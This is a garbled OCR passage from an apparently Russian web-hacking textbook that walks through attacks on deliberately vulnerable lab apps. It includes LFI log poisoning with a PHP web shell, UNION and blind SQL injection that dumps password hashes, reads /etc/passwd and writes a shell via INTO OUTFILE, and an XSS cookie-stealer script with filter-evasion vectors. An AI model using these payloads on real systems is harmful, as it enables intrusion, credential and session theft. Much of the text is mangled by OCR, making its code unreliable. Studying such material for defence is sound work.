Referer: http:/7127,0,0,l/<pro><?passthru($jGET['cmd']);?></pre>
I I Enter.
Referer, User-Agent.
:
httpd://l0calh0St/1ndex,php?page-i/,./1 ogs/access_log^00&cmd-1 s+-1a
I lain - +, Is -la.
.
access_Jog,
(. 04.8).
', errorjog . ,
I tpd ( FTP),
, Apache, - ( ,

location fcfM
,

fll

t fttrattan; ( f t htjpy/lucalltaftl/fmltt* plip?|wge~/./.yitf*^acceftJog%00&cnrd*lct;uname+-a;pwd;l*+'la

/'/I//,/iij/i

//;</ / / / / / / / / , > ( , / / / '

/X
'/,'/<"'> WHiiMnnwflUrWh

127.0,0.1 l27/|uri/2010:19:27:41 -1-0000J 'GET/cmd.php?cmd=ls HTTP/1.1 200 284 127.0.0.1


- [27/}un/2010:19:27:53 +0000] ''GET/cmd.php?cmdls$IFS-!a HTTP/1.1 200 1439 127.0.0.1 - [27/]un/2010;19:35:07 +0000] "GET / HTTP/1,1" 408 - 127,0,0.1 - - [27/|un/2010:19:38:04 + 00 0 0]
"GET / HTTP/1,I 200 451 127.0.0.1 - - [27/]un/2010:19:40:54 + 0000] GET
u ld *9 9 (n o b o d y ) y.ld<98( nobody) groups98(nobody)
Linux bt 2.6,20-BT-PwnSauce-NOSMP #3 S at Feb 24 1 5 :5 2 :5 9 GMT 2007 i6 8 6 i6 8 6 i3 i
/u ir /lo c a l/e p a c h e /h t d o c *
t o t a l 61
d rwx " -x 11 ro o t ro ot 380 Jun 25 10:17 I
d rwx -x r -X 10 ro o t ro o t 107 Jan 18 2009 j
drw xr -x r -X 13 ro ot ro o t 936 Jan 18 2009 base
d r wx r -x r x 10 ro o t ro o t 107 Jan 18 2009 b eef
62 Jun 16 1 7 :0 8 cmd.php
rw- r r mm 1 root ro o t
rw - r - . f 1 ro o t ro o t
37 Jun 16 16:53 cmd, php1 ro o t ro o t
81 Jun 16 16:08 cm d.pi
* rw- r - * r
* rw- r - * 1 ro o t ro o t
79 Jun 16 16:08 cm d.pl~
1 ro o t ro o t
79 Jun 16 16:07 cmd. t x t
- rw- r . * r
1 root ro o t
rw - r r
51 Jun 25 0 0 :4 2 cmd2 , php
1 ro o t ro ot
- rw- r - r
49 Jun 25 0 0 :4 1 cmd2 . php1 ro o t ro ot 109 Jun 25 0 7 :1 9 fo rm .h tm l
- rwr - r
d rwx r - x r -X 2 ro o t root
60 Jun 17 15 :49 Images
1 ro ot ro ot
rw - r
66 Jun 15 22 :42 in d e x . php

4 IfiilM lM lfilir;1;;;
....'-.

. 0 4 .8 , - access_log

44

04. -

- ).
, , ,
txt, 1 . .
, .
. , .
- <><? passthruC$_GET[' cmd ' ]); ?><>, avatar.gif
, :
http://[target]/forum.php?page=./../smi 1eys/avatar.gi & s

.
, avatar.gi f ,

- .


-
-. :
/logs/error.log
/logs/access.log
/logs/error_log
/logs/access_log
/var/log/error_log
/var/log/access_log
/var/log/error.log
/var/log/access.log
/var/www/logs/error_log
/var/www/logs/error.1og
/var/www/1ogs/access_log
/var/www/logs/access.1og
/var/log/apache/errorjog
/var/1og/apache/error.1og
/var/1og/apache/access_l og
/var/1og/apache/access.log
/var/1og/httpd/error.1og
/var/1og/httpd/access.1og
/var/1og/httpd/errorJ og
/var/1 og/httpd/accessJ o g


,

(switch case). -:

45

<?php
global $page;
switch ($page)
{

case ' :
Include ("pages/maln.php");
break;
case 'Index':
Include ("pages/maln.php");
break;
case 'p a g e l':
Include ("pages/pagel.php");
break:
case 'page2':
1nc 1ude 11pages/ page2.php"):
break;
default:
Include ("pages/error.php"):
break;
}
?>


str_re p la c e ().
, php. ini
:
allow_url_1nclude - Off
allow_url_fopen - Off
eg1str_g1oba1s - Off
mag1c_quotes_gpc-0n
safe_mode - On

//
// fopen
//
// " " (00)
// safe_mode.
/ / /etc/passwd


P H P -,
:
<?php

function stripslashes for array(&$array)


{

reset ($array)

while (11st($key,

$val) - each($array))

If ds_str1ng($val)) $array[$key] = stripslashes($val):


elself (1s_array($val)) $array[$key] = stripslashes_for_array($val):
&

46

04. -
return Sarray;

}
if (!getjnagi c_quotes_gpc())
{
strips'! ashes_for_array($_POST):
stripslashes_for_array($_GET);
}
if(isset($_GET['file']))$fi1e=$_GET[*file'];
else
{

i f (i sset($_P0ST['f 11e'] ))$ fi1e=$_P0ST[file '] ;


else $ f ile = " ;
}
$fi1e=str_replace('

$fi 1e);

$file=str_replace(' . ' . " ,$ file );


if(!fi1e_exi sts("include"..$file.1.php)||$file =='index')
{
$file='news';

}
include("include" . ' ,$file.'.php');

?
stri psl ashes(), . ,
. (' /'
1.') str_repl (). (
fi 1e_exi sts ()), $file=' news'.
.
- ,
-, , .
.

SQL-

SQL- Cypher.
http://localhost/webexploitati__1!2 fcy dh o r .
. 05.1.

IflC V b w

6<t

&&kmwics Todz.

Ssrings jmde*

*
' & 3 * \ \ ^
iQCOtiOn fa nftp://)/01IHClaQe 02'C^l"
M y D is c u s sio n s

,/CSC 2 ^

( u pQSfcS} I I

Login
Guest access granted. You have to rep>ste^ ifyou want to post messages.
U sernam e::

' P assw ord:;

-g ^ - -escs

S earch
F in d :;

in Field: Text

Forum s

^esrer

in rsrurrj:

Metr TiUf lajtfwst

re - f& m rtz v s*

\
UetiftI

-*

}'\<\*

. 05.1. Cyphor

n^msg.plm. .
e x it.
# ( . 05.2 )
. .
. ,
Cyphor
.
, , newws9,Dfcp SQL fid ( SQL-

48

05. SQL-

B<r

//

//

A l e x

//

f f ig t lie f t p

//

$ ,

e r s t - e ll e n

S u z u k i,

e r s t e l l t

P a r a m

e t e r

7 ,

Q f c t & b tr

2 0 0 0

p it f

|jj|........................

/ / p ief; ID dsr Nacfrrichtr a i/f d ie gedntmrtct wir4,


f x d t Forum JT0

//

in c lu d e . { * in c lu d e / d b _ a y s q l ,p h p x ) ;
i n c l u d { " i n c l u d e / s e t t i n g s . p h p eJ I
incltt&gi*i n c l u d e / g l o b a l , p h p * } |
/ * Include the file V
$tang_fiX< " l a n g / * , ^ langua ge , " . p h p * ;
in c it ic le { $ l a n g _ f i i e ) |
open__session{ | ;
if

( $ l o g i n && $ p e s s)
lo g in ( $ lo g in , $ p a ssj;
e ls |
e x it _ p a g e jr fit h _ 5g ($ te rr_ n o tJto g g e d _ :in ,

.
>

111J;

i n d e x , p h p , f t ^ l o g i n )i

. 05.2. newmsg.php

(SQL-injection)? SQL,
. SQ L (Structured Query Language
) . SELECT
. , SELECT id, password
FROM users id password users, SELECT * FROM
users users.
, (,
). SQ L-, INSERT (
) UPDATE (, ),
, .
UNION . :
SELECT fid, title FROM forums UNION SELECT nick, password FROM users

,
. , UNION
,
. , ,
SELECT, .

.
(1, 2, 3...), (
), (nul 1)
SQL-. .
( FROM),
, .
, cyphor_users,

SQL-

49

nick () password ().


:
union select 1 from cyphor_users

:
http://1 !host/webexploitation_package_02/cyphor/newmsg.php?fid=-1 union select 1
from cyphorjjsers

,
, . SQL,
( ) MySQL,
/* ( --),
. . 05.3.

Location'

dit

View

Qo bookmark!*

Location;

Tools

Settings

window

Help

\
Ift

ho5tfwebexploltation_packege_O2/cyphor/nevvmsigKphp7fidl%2Ounlon%2Oselect%2Dl%20from%2Qcyphor-users;'r !

N ot logged in!

LoginMySQL Error: In v a lid SQL: SELEC T* FROM c yp h o r^fo ru m s W HERE i d = l u n io n se le ct 1 fro m

c y p h o r jjs e r s
Database error; 1222 (T he used SELECT statem ents h a ve a d iffe re n t n u m b e r o f colum ns)

Please c o n ta c t us radm in(c& dom ain.extl a nd s p e c ify th e e x a c t e rro r m essage.


Session h a lte d .

Page loaded.

. 05.3. SQL- newmsg.php

, SQL
( ), ,
.
,
(%20). ,
(+) /**/,
.
, .
(union select 1,2,3,4 from cyphorjjsers),
(. 05.4). ,
, .

50

05. SQL-
; Kooqueror
location

dit

View

4
E>Location:

Qfi

&ookmarks

Iools

Settings

Window

a
2/cyphor/newmsg.php?fldl%2Ounion%2Ose(ectt(>2Ol,2,3.4%20from%2Ocyphor_U!bersj'*
j^
u

Not logged in!

LflfllP

rn:r

New message in forum 2


breaks areprocessed, you don't need to force them through <BB>. HTML tags willbe Uttered! Links wltfautomatically be
generated.

From:
Subject:

_____ __ __

il

tj&j&tegssxis#

. 05.4. UNION SELECT

2.
nick ( ,
Cyphor). . 05.5
( admi ).
m? - Konqueror
Location

Edit:

View

goofcmarks

Jools

Settings

Window

Help

0t| | | ..1... 4
% 'rs> |
> Location:

^hor/newmsg.php?fid=l%20union%20sdect%201,nick3,4%20from %20cyphor^u5ere]^ j ]
f

Not logged in!


LooiD
New message in forum admin

Line breaks areprocessed, you don't need to force them through <B8>. HTML tags w f be filtered/ Links wautomatical be
generated.

From:

p..~...
1

Subject:

^1/
I
I
i
ij
>
Ii
j
i
i
i

... .

.....

.-------k.

11 V

m
>ED
11Sff
t.t Ij

Page loaded.

. 05.5. (adm in)

2 password
admi (. 05.6).
Cyphor cry p tO ,
(

SQL-

; ')\

51

ndow

Not logged int


!
___________________________
New message in forum ad4ERM.YJ7j9A"
Linebreaks areprocessed, you don't need to force them through <Bfi>. HTML fogs willbe tittered! Links will

be

Qemreted.

From:
Subject:

ii

ii

ii
i

. 05.6. admin

).
, ,
Cyphor ,
8 , ,
. ,
DES,
John The Ripper (. ). , Cy
phor ( ),
(. 3).
M ySQL ( ),
M ySQL . , ,
versionO, userO databaseO.
concat_ws:
concat_ws(0x3a,version()Iuser(),database())

().
:
5,0.24:root@11host:cyphor
/1
concat, :
concat(name,0x3a,id)
,
group_concat, :
group_concat(passwod)
Cyphor,
, ( ).

52

05. SQL-

/etc/passwd.
MySQL 1oad_f 11 (' etc/passwd1).
( ),
:
1oad_fi1(0x2f6574632f706173737764)
,
(. 05.7).

Location

dit

: '% ft:

yiew

oofcmerto

J p o

Is

Sellings

: P 4 .4 4

Window

jdp

*
'

Location ; (fer n%20sefect%201,loedwf<le(0x2f6574632f706173737764),3i4%20from %20cyphor_u5ersj$

N o t lo g g e d in i

Loain

N e w m e s s a g e in f o r u m " r o o t : x : Q : 0 : : / r o o t : / b in / b a s h b in :x :1 :1 : b in : /b in :
d a e m o n : x : 2 : 2 : d a e m o n : / s b in : a d m : x : 3 :4 :a d m :/v a r /lo g : lp : x : 4 : 7 : lp : / v a r / s p o o l/ lp d :
s y n c : x : 5 : 0 : s y n c : / s b in : / b in / s y n c s h u t d o w n : x : 6 : 0 : s h u t d o w n : / s b in : / s b in /s h u t d o w n
h a lt:x :7 :0 :h a lt:/r > b in * 7 s b ln /h a lt m a il:x :0 :1 2 :m a il:/: n e v /s :x :9 :1 3 :n e v /s :/u s r /lib /n e w s :
u u c p : x : 1 0 : 1 4 : u u c p : / v a r / s p o o l/ u u c p p u b lic : o p e r a t o r : x : 1 1 : 0 : o p e r a t o r : / r o o t: / b in / b a s h
g a m e s :x :1 2 :1 0 0 .g a m e s :/u s r /g a m e s : ft p : x : 1 4 :5 0 ::/h e /ftp :
s m m s p : x : 2 5 : 2 5 : s r r im s p : / v a r / s p o o l/ c lie n t m q u e u e :
m y s q l: x : 2 7 : 2 7 :M y S Q L : /v a r / lib / m y s q l: / b in / b a s h r p c :x :3 2 :3 2 :R P C p o r tm a p
u s e r ^ T b in / f a ls e s s h d r x : 3 3 : 3 3 : s s h d : / : g d m ^ c :4 2 :4 2 :G D M * y v a r /s ta te /g d m * ib in /b a s h
p o p :x :9 Q :9 0 :P O P :/: n o b o d y : x : 9 9 : 9 9 : n o b o d y : / : p o s t g r e s :x :1 0 0 0 :1 0 0 ::/h o m e / p o s t g r e s :
# Arrafc? z r e p ro c e s s e d , y o u d

o r ttn e e d t o f o r c e jh e r t i th ro u g h < B 8 > . H T M L t ig s w ffib e f it e r c d i L in k s w ita u to m 9 .tic a / fy b e

g e n e ra te d .

___Crnm; v
fa g e loaded.

. 0 5 .7 . /etc/passwd loadjfile

2 SQ L- show.
php, 4 SQ L-
.
.
,
SQ L-:
param=l union select 1,2,3,4,5,6,7,8,9,10,11,12.13,14

,
SQ L- , 1. ,
.
, SQ L-
:
param=l+union+select+1.2,concat(user_name.0x25, password.0x25, email),4,5,6.7.8,9,10
,11,12,13,14,15 from p_user ,1

,
, (-- /*),
. ? LIMIT,

53

.
:

paramlnin1on+ilct+l.2.concatuser^name.0x25. password.0x25, email),4.5.6.7.8,9,10


,11,12,1,, 14,16 com I it I? 1 1M11 0
,1
SQL :

ram-l+un1on+sel | ,2, concat Juser name, 0x25, password. 0x25, email) ,4,5,6,7.8,9.10
,11,12,13.14, 15 from pjjser LIMIT 07l
.
1 ( ), WHERE:

param-l+unlon+selec!;1,2, concat(user_name,0x25. password.0x25. emai 1).4,5.6.7,8.9,10


,11,12,13.14,15 from pjjser WHERE 1
:

param-l+unlon+stlect+1,2 ,concat(userjiame,0x25, password,0x25. emai 1).4,5.6,7,8,9,10


.11,12,13,14,15 from pjJSer WHERE 1-1
WHERE 1*1 S Q L ( 1 = 1)
,
.
, id=31,
(-, +, * /),
(, 1 0).
,
(/* --).
,
( SQL).


select .. .into outf^^ee ,
-.
/usr/1 I/apche/htdocs/ chmod 777 cyphor.
cyphor. ,
. nobody,
Apache, ,
. ,
, images include.
. select .. .into outfile
, SELECT, .
SQL- newmsg.php.

54

05. SQL-

Cyphor user , txt * ''


:
select I,concat_ws(0x3a,n1ck, password), 3,4 from cyphor_users into out lilt /u'.r/
local/apache/htdocs/webexploitation_package_02/cyphor/user.txt

:
http://1 ocalhost/webexpl1 tation_package_02/cyphor/showmsg.php?f 1d- I union selw.-t
1, concat_ws(0x3a,n1ck.password),3,4 from cyphor_users into outf 11e 7usf7lufj.il/
apache/htdocs/webexploi ta ti on_package_02/cyphor/user.t x t '

, ,
h ttp : / /1 1host/webexpl oi tat i on_package_02/cyphor / user. txt:,
(. 05.8). <
admi .
|flgMtp7/tocalhost/webexploitatior>_paclcage_02/cyphor/user.txt*Konquf' ff
Location

i.

jEdit

; |

& Location:
jf.

\ew

jo

bookmarks

11 |

Tools

gettings

Window

jttefp

-4

h ttp ://lo c aiho5t/w ebexploitation_package_02/cyphor/U 5m txt

ad~in7ad4ERM. YJ 7j9A.

3.

R etrieving 2 6 fro m lo c a lh o s t...

. 05.8. Cyphor

, . , i i/
, ( I )
4 , ( k o i
,
2). i </,
, .

-
, o u tfH e
-.
hex. . :\
union select 1.2,3,4 :
hex( "<prex?

system( $_GET[ cmd' ]); ?x /p re > ")

55

. 05.9 ,
.

lo c a tio n

Edit

Qo jSookmarfcs

J o e ls

S ettin g s

W in d o w

a
Location:

http^'/localhost?webexp!oitationj>ackag_02/cyphor?nefmsg php?fid=-l%20umon%20se^ect%201.hcxt',^**

Not logged in!


New message in forum
"3 C 7 0 7 2 6 5 3 E 3 C 3 F 2 0 7 3 7 9 7 3 7 4 6 5 e D 2 8 2 4 5 F 4 7 4 5 5 4 5 B 2 7 6 3 6 D 6 4 2 7 5 D 2 9 3 B 3 F 3 E 3 C 2 F 7 0 7 2 6 5 3 E >
Linebreaksereprocessed, youdon'tneedto force themthrough

HTML taps

tittered.1Links witautoma&catybegenerated.

From:

. 05.9. - hex

( ) ,
,
( ).
( ):
http://localhost/webexploitation_package_02/cyphor/showmsg.php?fid=-l union select
X3C7072653E3C3F2073797374656D28245F4745545B27636D64275D293B3F3E3C2F7072653E
.null.null.null into outfile 7usr/local/apache/htdocs/webexploitation_package_02/
cyphor/shell.php'

-
shell.php, ,
, :
http://1 !host/webexploi tati on_package_02/cyphor/shel1.php?cmd=ls+-1a

. 05.10.
,
, , S Q L . ,
.
S Q L -? .

D V L - ( :
--- sql in je ctio n ).
, .
.
(, ComicShout v.2).

56

05. SQL-

packagejD2/cyphor/5hef php *nqueror


L o ca tio n

E d it

View

go

jk* \
> Loca tion :

b o o k m a rk s

J o o ls

S e ttin g s

j^ in d o w

JU Q U

<

w. |tm

h ttp ://lo c a lh o sl/w e b e x p !o ita tjo n _p a ck a g e _0 2 A c yp h o r/s h c ll.p h p ? c m d * ls + -la

t o t a l 74
d rwx rw x rwx
drw xr-xr-x
drw xr-xr-x
- * - - - - -

drw xr-xr-x

9
19
2
1
2

ro o t
ro o t
ro o t
ro o t
ro o t

ro o t
ro o t
ro o t
ro o t
ro o t

10 0
366
281
3617
69

May
Jan
Jan
Jan
Jan

22 1 6 : 3 6
18 2 0 0 9
18 2 0 0 9 a d m in
18 2 0 0 9 c y p h o r . c s s
18 2 0 0 9 d o c

P a ge loaded.

. 05.10. -

SQL-
, , , S Q L -.
, show.php
Cyphor. :
$message_mode = 1;
:
Sid = intval(Sid):
i f ( ! Sid)

{
}

die(<brxhl>Hacking attempt!</hl>);

;...

... .

. _

'

, i d,
, . ,
.
. 05.11.
, fid,
.
, ,
. :
$text_to_check I mysql_real_escape_string ($_GET["3anpoc"]);
$text_to_check = strip_tags($text_to_check);
$text_to_check = htmlspecial chars($text_to_check);
$text_to_check = stripslashes($text_to_check);
$text_to_check = adds1ashes($text_to_check):
$_GET["] I $text_to_check;

SQL-
ag ghttp^lQcaBiQst/webexptoitationj>acka9e^02/cy^Ky/show.pilf^
lo c a tio n

E d it

V ie w

b o o k m a rk s

T o o ls

S e ttin g s

W m dc*

57

H&

u>Vn1

\
E> Lo catio n:; ord.8,id,10%20frDm%20cyphorjJSrs%20y<*t*re%20:t5=i ^

Hacking attempt!

'Page loaded.

_____

. 0 5 .1 1 . show.php

SQ L
select, union, order, char, where, from.

,
, .
(, ):
ini_set( 'displayerrors'. O'):

fe

.
h i
. ,
, , ,
SQL-. 5:
$section = $_GET[section];
$result I njysql query ('SELECT * FRCP
'tbljiame' WHERE 'section' | Ssectior. *);
if (!$result || mysql_num_rcws (Sresult) = D) {

.QIC ~^r ion:

header ("Location: h t t p : //S SERVERHTTP fflS fl "


e x it ( ) ;
} els e {
. . . / /

}

. i

'

58

0 5 . SQL-

(wo
, '' ftjp ,
^, \ ),
, \ >
.
(CMS), \>
,
'' , ( (
shell,
, SQL , ,
,
.


* cam
. ,
ii\\Sv}l:
http://www,site.net/module.php?1cH-1 union select K,\userO.-l

ERROR 1267 : 11legal mix of collations (Uitinl. s\v<s6sl\ci .IMPLICIT) end


general_c1.SYSCONST) for operation UNION'
, , ,
la ttn l, swedish, , ' user(),
utf8_general. M y S Q l *,
, UNION .
, Uvt ml userO
convert ;
convert(user() using lat.inl)
:
http://www.sil:e.n(?t:/BK)clu11*.php?itl- 1 union select 1,2, convorUuserO using
lat1nl),4 -
.
S Q I
M ySQ L, SQ L MS S Q I,
5,

(Cross-Site Scripting, XSS)


,
- .
XSS, CSS,
, , CSS
(Cascade Style Sheets),
. X XSS
, (- cross), , , ,
.
XSS HTM L/
JavaScript/VBScript- ,
.
,
, .
: .
.
,
,
. XSS,
.

XSS
cookie-
.
cookie ( )?
, .
cookie-

60

, > </ {/ &


cookie :!, ,

, <*"
%
.
1
0) &
Hacked by V .Pupkin. 1 %$$< I 1
, ( ' ;).
(,&0
JavaScript VBScript, / , //
- * . ( 1&&1, WM, 0
, . , '
XSS , 'iWOf 11 ; (>\'
,


'
, -
XSS, , XSS ^
, - /, ( ~
. ^ -
, , 11 %'SMi &

, !.
.
, , ,
search, . 11
,
:
script.php?search-[ncKQMafl I
, html
, :
scri pt.php?search
<b>Hacked</b>
,
, I lacked.
, ''marquee - </ rquee,
, <hl> </hl>, ' /
. ,
. .
, ,,

61

- - .
<b>Hacked</b> cookie (
). , ,
,
( , %3 ):
script. php?search-fc3cmarqueefc3eHacked*3c/marqueefc3e

,
GET:
scri pt.php?search<b>Hacked</b>

,
POST, . html, P O S T .
, javascript-,

.



html-. ,
XSS-. ,
, html-,
. XSS-
.

. ,
, .
,
, ( ) .

( ).
, ,
html-, html, ,
.
, :
<script>alert('Hacked by Vasya!')</script>. XSS

Hacked by
Vasya!

62

06.

X S S - ; ,
, ,
, , .

-,
XSS
-. XSS.
name.php :
<?php
$name-$_GET[name1]:
echo "Your name is Sname :

?>

/usr/local/apache/htdocs.
form.html :
<form act1on-"name.php" method-"GET">
<1nput type-text name-name">
<input type-submit value-"0IC,>
</form>


() name. php.
http://localhost/form.html (. 06.1), (, Vasya)
.
http//localhost/formhtml>Konqueror
L o c a tio n
& (n d o w

E d it

ifiew

fio

ftookmarfcs

lo o t s

V |

Settings

Help

E>

9 9

Lo catio n :

h ttp :/flo c a lh o s tffo rm h tm l

OK

Page loaded

. 06.1. form.html

name.php , . 06.2.
, form.html
<hl>Hacked<hl>, Hacked,
. 06.3.

-, XSS
K o n q u e ro r

Edit

Location

yiew

go

bookmarks

To o ls

63

Settings

W indow

ttelp
*
1

Wm 1

lIS
w.

f i t *%

, i

Location: j| i http://localhostfname.php?name=Vasya

L.

Your name is Vasya

;Page loaded.

. 06.2. name.php

lo ca tio n

dit

&4

fc

yiew

bookm arks

sS

Jo o ls

N '

Settings

W indow

Help

Location; j ^ http://localhost/nam e.php?nam e=% 3Chl% 3EH acked% 3C hl% 3E; ^

Your name is

Hacked
Page loaded.

. 06.3. name.php html-

, html- ( <hl> </hl>,


) ,
-, name.php.
:
JavaScript. form, html
<script>a1ert('Hacked by Vasya')</script>

<script> </script> (),


alert() .
, , , ,
. 06.4.
( Location)
, ,
( ).
, - . (
,

64

.
gift
lo catio n

tp /rtocalhost/form ht
dit

^tew

&

bookmarks

- - >

Tools

Settings

Window

Jfclelp

& io calho st 1

> Location: ? script%3Ealei

Your name is

| % 3 C % 2 F s c rip t% 3 E
Hacked by Vasya

||j| :j

................................. I '

(localhost contacted- W aiting for reply.

. 06.4.

.)
cookie-.
cookie,
<scri pt>alert(document.cooki e)</script>

Dam n Vulnerable Linux ,


cookie, - . 06.5.

. 06.5. cookie

, , cookie-
, .
javascript-,
cookie- - (
-), , ,
. -,
- cookie.
( D V L ),
.
<?
$query = $_SERVER['QUERY_STRING1]; //
// cookie, JavaScript *
$query .= "\";
//
$db="/tmp/cookies.txt":
// ,
// cookie
$fh-fopen ($db, "+"):
// ,

:s ($fh, "$query");
fclose ($ fh );

, XSS

65

//
// ( cookie >,i )
I I cookie
// 3d .

?>

php- cookie-
c o o k 1 e s .t x t .
, .
/usr/local/epache/htdocs stea I.php. Cookie-
/1,,
, /usr/local/apacho/htdocs nobody,
-, .
, nobody.
javascript- :
<scr1 pt>document. 1ocatl on. repl a c e (' http: 11_1_. php?com-' +document.
cookie);</scr1pt>

document.location.replace

cookie-

'http: 11_/ _. php

?com-'+document.cookie
cookie-, ,
? ( QUERY_STRING),
cookie-, ,
-. cookie
, .

cookie- -
cookies. txt.
form.html :
<scr1pt>
document. Iocatlon. rep Iace(http; I I ) oca1host/steal.php?com-'+document.cookie):
</scr1pt>

OK ,
stea I .php. /tmp
cat cookies. txt cookies .txt cookie-
(. 06.6).

base64, .
. .
, ,
- . .

66

cat

c o o k ie s ,t x t
COi?l=7fl35<19da497dS4931966aeB86C03ce9=O9d61c9bde3Q22587576O58253fcac25;%2OPHPSESSI
J3efd3bca772a907bceacdcS6de$i#$ffa;% 2O phpbb2iB ysq,l_sid=4e715bdOfad5O440fOale5bbeee
3 f b 2 5 ;%2Ophpbb2ray5ql_data=a%3A0%3A%7B%7D
b t tmp # I

. 06.6. cookie-

, cookies .txt
cookie- . (,
- 15-, 03,
, ).
cookie- , 1 ( Internet
Explorer), Opera Firefox.
,
, .
( ),
, (
, html-).

. , , ,
, , , , , .

, ,
( , )
. ,
, ,
() ,
( ). - !

... ,
, html- .
, -
,
.
XSS html- .
:

<script>

67

function ShowPage(){
// page <html>
var page=docurnent.getElementById("html");
/ / CodeOfPage
var CodeOfPage=page.innerHTML;
// alertO
alert(CodeOfPage);
}
, ,

/ / , .


<script>
, <script> ?
<script> .
, , X S S . , javascript (
vbscript).
(alert),
.
, ,
:

, ;

, Internet Explorer.

, .

<>. ,
. <> refresh, CONTENT
:
< HTTP-EQUIV=refresh" CONTENT="0;url=javascript:alertI' XSS'): ">

<B0DY>. :
<B0DY BACKGROUND-"javascript:alert(' XSS')" >
OnLoad, .
javascript- :
<B0DY 0NL0AD=alert(XSS

<IMG>. SRC:
<IMG SRC=javascript: alert(XSS )">
, javascript ?
:
<IMG SRC="javascript: alert( ' XSS' ) ">

68

.
:
<IMG SRCjavascript:a!ert('XSS*)>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC="
javascript:alert(XSS'):">
VBScript:
<IMG SRC='vbscript:msgbox("XSS")'>

<STYLE>. IE , ,
:
<STYLE TYPE=''text/javascript">alert( 'XSS') ;</STYLE>
, Internet
Explorer.

<TABLE>. .
BACKGROUND, . ,
javascript-:
<TABLE BACKGROUND-"javascript:alert( ' XSS')">

<DIV>. . ,
<div> </div>, .
:
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
, url () expressionC):
<DIV STYLE-"width: expression(alert('XSS'));">

<STYLE>. ,
<STYLE> </STYLE>. :
<STYLE>.XSS{background-image:ur1(
"javascript:alert('Hacked') " ) ;}</STYLE><A CLASS-XSS></A>
XSS ( X S S -),

< CLASS=XSSx/A>
:
<STYLE> type="text/css">BODY{background:url(
"javascript: al ert ( 'Hacked'))} </STYLE>
X S S -
.

<BGS0UND>. ,
javascript-:
<BGS0UND SRC-"javascript:alert XSS');">

<IMG>. .
, Interne*
Explorer. DYNSRC L0WSRC.
:

<script>

69

<IMG DYNSRO" javascri pt;a Iert(' XSS' I">


<IMG L0WSRC-"javascript:a Iert( 'XSS')">
SRC ,
,
<0BJECT> html-.
javascript- :

OBJECT TYPEHtext/x-scr1ptlet" DATA"http://www.s1te.com/test,html"></0BJECT>


, .
.
.
.
, X S S .
X S S :

javascript- ;

VBScript-;

(
);

X S S - < 1MG> Firefox.

SQ L-

SQL* M ySQ L,
M S S Q I , it . 11
, , 11
, ,
SELECT UNION,
.
, * M ySQ L,
. ,
.
( -- /*),
,
. , INSERT
(. ), ,
. (.'
, , ,
. ,
,
.
, , ,
.
:

http://|1 t e ,com/news, | | | | | 1d" 12


,
,11
, :

news,php?1d-l2 i l l )
, .
:

news,php?1d*l2 and 1*2


, .
, , ,
, ,
,
, .
, :

mysql.user

71

news.php?i(H.2* and l-l


news.php?id-12 and 1*'2

.
, ,
! 1=2, ,

1=1.

.
, ( 1=1),
( 1=2). ,
, , , ,
, .
, .

MySQL
@@version
M y S Q L .
, M y S Q L .
:
news.php?id=12 and substring(@@version,l)=4
Aversion
(=4). , ,
, 1=2.
, 4 5 .
, , M y S Q L S .
4 5 , 3. , M y S Q L 3 ,
- ,
SELECT

UNION .

------------- ---------------------------------------------- ---------------------------------------------------------- @@version versionQ.


mysql.user
, ,
. select *
news.php?id-12 and (select 1)=1

72

07. SQL-

, .
, '
, mysql. user:
news.php?id=12 and (SELECT 1 from mysql.user limit 0,1)*1

mysql .user, ,
, . ,
, , mysql .user, !
M y S Q L loacM i1()
0UTFILE. , *
limit 0.1,
;
.
limit.


M y SQ L S,
information_schema ,
.
,
users:
news.php?id=12 and (SELECT 1 from users limit 0.1)-l

users, .
, .
M y S Q L 4,
.



- ,
. , users
,
:
news.php?id=12 and (SELECT substring(
concat(1,password),1,1) from users limit 0,1)-1

password,
substring ( ), ,
1, password .
password, .

73


/
,
, ,
. SQL-.
(username) (password) users.
, , ! username, password,
email userid.
(username) (password) where:
news.php?id=12 and ascii(substring((SELECT concat(
username.0x3a.password) from users where user1d-2),1,1))>100

limit 0.1.
,
,W
. , ,
/
. , select
W

substring( .1.1),
. ascii
A S C II-. > 100.
A S C II- , 100,
.
, , 100
:
news.php?i=12 and ascii(substring((SELECT concat(
username.0x3a.password) from users where userid-2),1 .1 ))>80

, , 80.
:
news.php?id=12 and ascii(substring((SELECT concat(
username, 9x3a,password) from users where userid-2).1 .1 ))>90

, :
news.php?id=12 and ascii(substring((SELECT concat(
usernanie.0x3a. password) from users where userid-2).1 .1 ))>85

, :
news.php?id=12 and ascii(substring((SELECT concat(
username.0x3a.password) from users where userid-2).1 .1 ))>86

, , . ,
85, 86, 86! ,
=86. , AS - (
char(86)). ,
V. , substring:
news.php?ia=12 and ascii(substring((SELECT concat(
username.0x3a.password) from users where userid-2).2 .1 ))>100

74

07. SQL-

substring ,1,1 .2,1,


select.
, .
>100 , :
news.php?id-12 and ascii(substring((SELECT concat(
username.0x3a,password) from users where userid=2),2,l))>120

, 110:
news.php?id-12 and ascii(substring((SELECT concat(
username.0x3a.password) from users where userid-2),2 ,1 ))>110

, :
news.php?id-12 and ascii(substring((SELECT concat(
username.0x3a.password) from users where userid-2),2 ,1 ))>105

:
news.php?id-12 and ascii(substring((SELECT concat(
username.0x3a,password) from users where userid=2),2,l))>103

. :
news.php?id-12 and ascii(substring((SELECT concat(
username.0x3a,password) from users where userid=2),2 ,1 ))>104

, , 104 we 105,
105. char( 105) i.
Vi. , 11
. .
( substring) , ,
, >0 . , ,
user/password .

SQL- NaboPoll
Damn Vulnerable Linux NaboPoll (
), results.php
, S Q L -. :
27...31
$res_question - mysql_query("select * from nabopoll_questions
where survey-$survey order by id"):
if ($res_question FALSE || mysql_numrows($res_question) == 0)
error($row_survey. "questions not found");

$surve.y () ,
S Q L -. ,
where .

SQL- NaboPoll

75

I ; .
mil III I; / (1 o<.'v\1host/webexploi tation_package_02/

nabopol IAulinI/ iirv<\y edit.php , . 07.1


: ]

ViwvV

W
S3* l&v iMK'h

... N

mtp /i IwV 1/\'|*111* I'to HMVKV

HB


1 |1 Poll
tt:v,

.........

4* jj, -1Ui>
.n
fc
ii-
. it.'U4i .-4
.H
i :iit
-i
Vi:4
11

vHMfic

vj

v S f

M l i l B l l i

v Ttot IP
IP

\+ \

L'J

? 1

v
iil' S.

. 07.1. NaboPoll


Actions ().
, ( ),
( Actions).
, 1
, . 07.2. (
http: / 11 1host/webexpl1tati on_package_02/nabopol 1/resul t .php?surv=l).
surv=l :
